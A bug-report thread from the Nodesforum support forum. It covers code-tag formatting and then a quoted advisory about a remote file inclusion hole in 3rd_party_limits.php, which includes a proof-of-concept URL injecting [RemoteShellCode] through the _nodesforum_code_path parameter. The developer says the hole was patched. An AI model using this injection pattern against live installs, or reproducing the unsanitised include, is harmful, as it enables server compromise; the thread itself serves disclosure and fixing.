search for: in: entire forum this post
you are here: root => Bugs => FIXED => FIXED in 1.034 - [code] tag sucks
member since:
folders:
10
posts:
22
replies:
75

FIXED in 1.034 - [code] tag sucks

the
code:
[code]

tag needs to be better for large codes

wassaa


test: test
post #84 permalink
please login to reply
member since:
folders:
10
posts:
22
replies:
75
example:


also i think that if you just removed or commented out the

code:
if($_nodesforum_folder_description!='')
{
	$user_or_guest=1;
	if($_nodesforum_creator_uniqueID==$_nodesforum_uniqueID_of_deleted_user)
	{$user_or_guest=0;}

	echo '<div style="height:4px;"><!-- --></div><div style="width:100%;"><table class="class_nodesforum_bgcolor3" style="width:100%;"><tr><td class="class_nodesforum_bgcolor2"><div class="class_nodesforum_inner">';
	echo display_bb($_nodesforum_folder_description,$_nodesforum_folder_p_inf_str,$user_or_guest,$_nodesforum_folder_description_disable_auto_smileys,$_nodesforum_folder_description_disable_auto_links,0);
	echo '</div></td></tr></table></div>';
}

if($_nodesforum_folder_description!='')
{
	$user_or_guest=1;
	if($_nodesforum_creator_uniqueID==$_nodesforum_uniqueID_of_deleted_user)
	{$user_or_guest=0;}

	echo '<div style="height:4px;"><!-- --></div><div style="width:100%;"><table class="class_nodesforum_bgcolor3" style="width:100%;"><tr><td class="class_nodesforum_bgcolor2"><div class="class_nodesforum_inner">';
	echo display_bb($_nodesforum_folder_description,$_nodesforum_folder_p_inf_str,$user_or_guest,$_nodesforum_folder_description_disable_auto_smileys,$_nodesforum_folder_description_disable_auto_links,0);
	echo '</div></td></tr></table></div>';
}

if($_nodesforum_folder_description!='')
{
	$user_or_guest=1;
	if($_nodesforum_creator_uniqueID==$_nodesforum_uniqueID_of_deleted_user)
	{$user_or_guest=0;}

	echo '<div style="height:4px;"><!-- --></div><div style="width:100%;"><table class="class_nodesforum_bgcolor3" style="width:100%;"><tr><td class="class_nodesforum_bgcolor2"><div class="class_nodesforum_inner">';
	echo display_bb($_nodesforum_folder_description,$_nodesforum_folder_p_inf_str,$user_or_guest,$_nodesforum_folder_description_disable_auto_smileys,$_nodesforum_folder_description_disable_auto_links,0);
	echo '</div></td></tr></table></div>';
}



from "bod_folder_view.php" (should be around line 50)

and instead place it where you want the description in "body.php" that would cause all the folder descriptions to appear up where you placed that code in the "body.php"

wassaa


test: test
post #85 permalink
member since:
folders:
10
posts:
22
replies:
75
i just fixed that, the fix will be available in 1.034

wassaa


test: test
post #129 permalink
member since:
folders:
10
posts:
22
replies:
75
1.034 is basically ready now but before i release it i will try to add a cool little link under each code tag that will select all the code

wassaa


test: test
post #138 permalink
a guest
Is this vulnerability fixed in the latest version of Nodesforum?;

Vulnerable Code in 3rd_party_limits.php line 6 - 8

---------------------------------------------------------​-----------------------------------------------------

$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodes​forum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}

---------------------------------------------------------​-----------------------------------------------------

The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.




PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesf​orum_code_path=[RemoteShellCode]


Fixtip: Declare $_nodesforum_code_path, likewise!


If not, YE GODS, MAN!!, fix it - I REALLY want to use this as my forum script of choice, but this exploit is all over Google and other search engines.
post #224 permalink
member since:
folders:
10
posts:
22
replies:
75
quote from a guest on post #224
Is this vulnerability fixed in the latest version of Nodesforum?;

Vulnerable Code in 3rd_party_limits.php line 6 - 8

---------------------------------------------------------​-----------------------------------------------------

$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodes​forum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}

---------------------------------------------------------​-----------------------------------------------------

The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.




PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesf​orum_code_path=[RemoteShellCode]


Fixtip: Declare $_nodesforum_code_path, likewise!


If not, YE GODS, MAN!!, fix it - I REALLY want to use this as my forum script of choice, but this exploit is all over Google and other search engines.



I was never 100% convinced that this vulnerability ever really existed in 1.059 because it was already discovered by someone else in 1.045 and fixed in 1.046. And back in the days of 1.046 I had tested the exploit myself and had received the confirmation from the person who had found the vulnerability that the fix of 1.046 was now preventing it. But somehow hacker bd0rk recently came forward, pretending that he was able to accomplish this exploit on 1.059.

Even though I never really understood how that could work for him, I still did apply an extra security against this in Nodesforum 1.060. Rob Keith from securityfocus.com has just confirmed to me that this exploit would fail in the latest version of the forum. so in other words, maybe the vulnerability existed before, maybe not, but one way or another now I know that it will not be possible. You can just look at the new code to see for yourself in 1.060 3rd_party_limits.php line 6 - 8

wassaa


test: test
post #226 permalink
please login to reply

moderators of this post

envis (level: ∞)
powered by Nodesforum